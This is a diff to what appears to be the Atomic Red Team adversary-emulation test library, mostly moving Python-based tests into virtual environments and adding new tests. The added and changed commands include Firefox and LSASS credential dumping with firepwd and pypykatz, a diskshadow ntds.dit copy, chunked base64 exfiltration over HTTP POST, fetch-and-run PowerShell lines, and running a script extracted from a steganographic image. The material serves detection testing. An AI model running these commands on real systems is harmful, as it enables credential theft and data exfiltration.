@@ -69817,36 +70541,52 @@ credential-access:
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Pip must be installed.
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: 'Firepwd must exist at #{Firepwd_Path}
+
+          '
+        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: "Pycryptodome library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pycryptodome) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe
+          install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" |
+          out-null} else {write-host "Visual Studio Build Tools (C++ Support) must
+          be installed to continue gathering this prereq"}
+
+          '
      - description: "Pyasn1 library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pyasn1) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe
+          install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null}
+          else {write-host "Visual Studio Build Tools (C++ Support) must be installed
+          to continue gathering this prereq."}
+
+          '
      executor:
        name: powershell
        command: |
          $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-          cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+          cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
          cat #{Out_Filepath}
        cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
          \  \n"
@@ -70882,42 +71622,50 @@ credential-access:
        Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

        Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'pypykatz must be installed and part of PATH
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live lsa
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
+        cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul

          '
        name: command_prompt
@@ -74370,6 +75118,24 @@ credential-access:
          mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
        name: command_prompt
        elevation_required: true
+    - name: Create Volume Shadow Copy with diskshadow
+      auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+      description: |
+        This test is intended to be run on a domain controller
+        An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+      supported_platforms:
+      - windows
+      input_arguments:
+        filename:
+          description: Location of the script
+          type: Path
+          default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+      executor:
+        command: |
+          mkdir c:\exfil
+          diskshadow.exe /s #{filename}
+        name: command_prompt
+        elevation_required: true
  T1558.003:
    technique:
      modified: '2023-03-30T21:01:46.538Z'
@@ -77494,6 +78260,15 @@ discovery:
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          printercheck -noninteractive -consoleoutput
        name: powershell
+    - name: Peripheral Device Discovery via fsutil
+      auto_generated_guid: 424e18fd-48b8-4201-8d3a-bf591523a686
+      description: Performs pheripheral device discovery utilizing fsutil to list
+        all drives.
+      supported_platforms:
+      - windows
+      executor:
+        command: fsutil fsinfo drives
+        name: command_prompt
  T1082:
    technique:
      modified: '2023-03-30T21:01:40.871Z'
@@ -79438,6 +80213,20 @@ discovery:
          Ignore"
        name: powershell
        elevation_required: true
+    - name: Enumerate Windows Security Log via WevtUtil
+      auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd
+      description: "WevtUtil is a command line tool that can be utilised by adversaries
+        to gather intelligence on a targeted Windows system's logging infrastructure.
+        \n\nBy executing this command, malicious actors can enumerate all available
+        event logs, including both default logs such as Application, Security, and
+        System\nas well as any custom logs created by administrators. \n\nThis information
+        provides valuable insight into the system's logging mechanisms, potentially
+        allowing attackers to identify gaps or weaknesses in the logging configuration"
+      supported_platforms:
+      - windows
+      executor:
+        command: wevtutil enum-logs
+        name: command_prompt
  T1087.004:
    technique:
      x_mitre_platforms:
@@ -80769,40 +81558,47 @@ discovery:
          description: hostname or ip address to connect to.
          type: string
          default: 192.168.1.1
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit
+          1 }

          '
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'adidnsdump must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      - description: 'adidnsdump must be installed

          '
-        get_prereq_command: 'pip3 install adidnsdump
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          adidnsdump 2>&1 | Out-Null

          '
      executor:
-        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+        command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass}
+          --print-zones #{host_name}

          '
        name: command_prompt
@@ -81087,7 +81883,8 @@ discovery:
      - description: 'Check if python exists on the machine

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
@@ -92032,7 +92829,39 @@ exfiltration:
      - 'Network Traffic: Network Traffic Flow'
      x_mitre_is_subtechnique: false
      identifier: T1030
-    atomic_tests: []
+    atomic_tests:
+    - name: Network-Based Data Transfer in Small Chunks
+      auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+      description: Simulate transferring data over a network in small chunks to evade
+        detection.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_file_path:
+          description: Path to the source file to transfer.
+          type: path
+          default: "[User specified]"
+        destination_url:
+          description: URL of the destination server.
+          type: url
+          default: http://example.com
+        chunk_size:
+          description: Size of each data chunk (in KB).
+          type: integer
+          default: 1024
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $file = [System.IO.File]::OpenRead(#{source_file_path})
+          $chunkSize = #{chunk_size} * 1KB
+          $buffer = New-Object Byte[] $chunkSize
+
+          while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+              $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+              Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+          }
+          $file.Close()
  T1537:
    technique:
      x_mitre_platforms:
@@ -0,0 +1,197 @@
+# T1001.002 - Data Obfuscation via Steganography
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
+<blockquote>Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Steganographic Tarball Embedding](#atomic-test-1---steganographic-tarball-embedding)
+
+- [Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage](#atomic-test-2---embedded-script-in-image-execution-via-extract-invoke-psimage)
+
+
+<br/>
+
+## Atomic Test #1 - Steganographic Tarball Embedding
+This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) 
+within an image.
+
+The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a 
+file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image 
+file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball 
+file within the image, utilizing steganography techniques for data obfuscation.
+
+This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. 
+By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c7921449-8b62-4c4d-8a83-d9281ac0190b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_file | Image file which will be downloaded to be used to hide data | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;T1001.002.jpg|
+| tar_file | Tarz file containing random passwords | path | $env:PUBLIC&#92;Downloads&#92;T1001.002.tarz|
+| new_image_file | new image file ready for extraction | path | $env:PUBLIC&#92;Downloads&#92;T1001.002New.jpg|
+| passwords_file | Text file containing random passwords | path | $env:TEMP&#92;random_passwords.txt|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Image file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{image_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+Write-Output "Downloading image file..."
+$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+```
+##### Description: File to hide within tarz file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Output "Generating random passwords and saving to file..."
+$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+$passwords | Out-File -FilePath "#{passwords_file}"
+```
+##### Description: Tarz file to embed in image must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{tar_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Output "Generating tarz file..."
+tar -cvf "#{tar_file}" "#{passwords_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Embedded Script in Image Execution via Extract-Invoke-PSImage
+This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. 
+The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden 
+within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
+
+The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden 
+PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a 
+separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
+
+In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
+is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| image_file | Malicious Image file which will be downloaded | path | PathToAtomicsFolder&#92;T1001.002&#92;bin&#92;evil_kitten.jpg|
+| psimage_script | Extract-Invoke-PSImage Script downloaded | path | PathToAtomicsFolder&#92;ExternalPayloads&#92;Extract-Invoke-PSImage.ps1|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cd "PathToAtomicsFolder\ExternalPayloads\"
+Import-Module .\Extract-Invoke-PSImage.ps1
+$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
+$scriptContent = Get-Content "$HOME\result.ps1" -Raw
+$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
+$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
+$base64Strings | Set-Content "$HOME\decoded.ps1"
+$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
+$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
+$textPattern = '^.+'  
+$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
+$scriptPath = "$HOME\textExtraction.ps1"
+$textMatches -join '' | Set-Content -Path $scriptPath
+. "$HOME\textExtraction.ps1"
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
+Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
+Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Image file must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{image_file}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+Write-Output "Downloading image file..."
+$imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+```
+##### Description: Extract-Invoke-PSImage must exist
+##### Check Prereq Commands:
+```powershell
+if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+{exit 0}
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+$scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+```
+
+
+
+
+<br/>
@@ -0,0 +1,148 @@
+attack_technique: T1001.002
+display_name: "Data Obfuscation via Steganography"
+atomic_tests:
+  - name: Steganographic Tarball Embedding
+    auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+    description: |
+      This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) 
+      within an image.
+      
+      The test begins by ensuring the availability of the image file and the tarball file containing data . It then generates random passwords and saves them to a 
+      file. Subsequently, the tarball file is created, containing the passwords file. The test executor command reads the contents of the image 
+      file and the tarball file as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball 
+      file within the image, utilizing steganography techniques for data obfuscation.
+      
+      This atomic test simulates the technique of data obfuscation via steganography, enabling attackers to clandestinely transfer files across systems undetected. 
+      By embedding the tarball file within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
+    supported_platforms:
+      - windows
+    input_arguments:
+      image_file:
+        description: Image file which will be downloaded to be used to hide data
+        type: path
+        default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+      tar_file:
+        description: Tarz file containing random passwords
+        type: path
+        default: $env:PUBLIC\Downloads\T1001.002.tarz
+      new_image_file:
+        description: new image file ready for extraction
+        type: path
+        default: $env:PUBLIC\Downloads\T1001.002New.jpg
+      passwords_file:
+        description: Text file containing random passwords
+        type: path
+        default: $env:TEMP\random_passwords.txt
+    dependency_executor_name: powershell
+    dependencies:
+      - description: |
+          Image file must exist
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: |
+          File to hide within tarz file must exist
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating random passwords and saving to file..."
+          $passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
+          $passwords | Out-File -FilePath "#{passwords_file}"    
+      - description: |
+          Tarz file to embed in image must exist 
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |  
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+    executor:
+      name: powershell
+      elevation_required: true
+      command: |
+        Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
+      cleanup_command: |
+        Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+        Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+
+  
+  - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+    auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+    description: |
+      This atomic test demonstrates the technique of data obfuscation via steganography, where a PowerShell script is concealed within an image file. 
+      The PowerShell script is embedded using steganography techniques, making it undetectable by traditional security measures. The script is hidden 
+      within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems.
+      
+      The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. The test proceeds to extract the hidden 
+      PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is then decoded from base64 encoding and saved as a 
+      separate PowerShell (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.
+
+      In the case of this atomic test, the malicious image file which is downloaded has the powershell command Start-Process notepad embedded within in base64. This
+      is done to emulate an attackers behaviour in the case they were to execute malware embedded within the image file. 
+    supported_platforms:
+      - windows
+    input_arguments:
+      image_file:
+        description: Malicious Image file which will be downloaded
+        type: path
+        default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+      psimage_script:
+        description: Extract-Invoke-PSImage Script downloaded
+        type: path
+        default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+    dependency_executor_name: powershell
+    dependencies:
+      - description: |
+          Image file must exist
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: |
+          Extract-Invoke-PSImage must exist
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Path "PathToAtomicsFolder\ExternalPayloads\" -ItemType Directory -Force | Out-Null
+          Write-Output "Downloading Extract-Invoke-PSImage.ps1 script..."
+          $scriptUrl = "https://github.com/raghavsingh7/Extract-Invoke-PSImage/raw/7d8c165d2f9bfe9c3965181079b7c82e03168ce1/Extract-Invoke-PSImage.ps1"
+          Invoke-WebRequest -Uri $scriptUrl -OutFile #{psimage_script}
+    executor:
+      name: powershell
+      elevation_required: true
+      command: |
+        cd "PathToAtomicsFolder\ExternalPayloads\"
+        Import-Module .\Extract-Invoke-PSImage.ps1
+        $extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
+        $scriptContent = Get-Content "$HOME\result.ps1" -Raw
+        $base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
+        $base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
+        $base64Strings | Set-Content "$HOME\decoded.ps1"
+        $decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
+        $decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
+        $textPattern = '^.+'  
+        $textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
+        $scriptPath = "$HOME\textExtraction.ps1"
+        $textMatches -join '' | Set-Content -Path $scriptPath
+        . "$HOME\textExtraction.ps1"
+      cleanup_command: |
+        Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+        Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
+        Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
+        Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
@@ -363,6 +363,8 @@ Python 3 must be installed, use the get_prereq_command's to meet the prerequisit

 Successful execution of this test will display multiple usernames and passwords/hashes to the screen.

+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
+
 **Supported Platforms:** Windows


@@ -372,53 +374,55 @@ Successful execution of this test will display multiple usernames and passwords/



+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_001|
+

 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


 ```cmd
-pypykatz live lsa
+"#{venv_path}\Scripts\pypykatz" live lsa
+```
+
+#### Cleanup Commands:
+```cmd
+del "%temp%\nanodump.dmp" > nul 2> nul
 ```



-
-#### Dependencies:  Run with `command_prompt`!
+#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
-```cmd
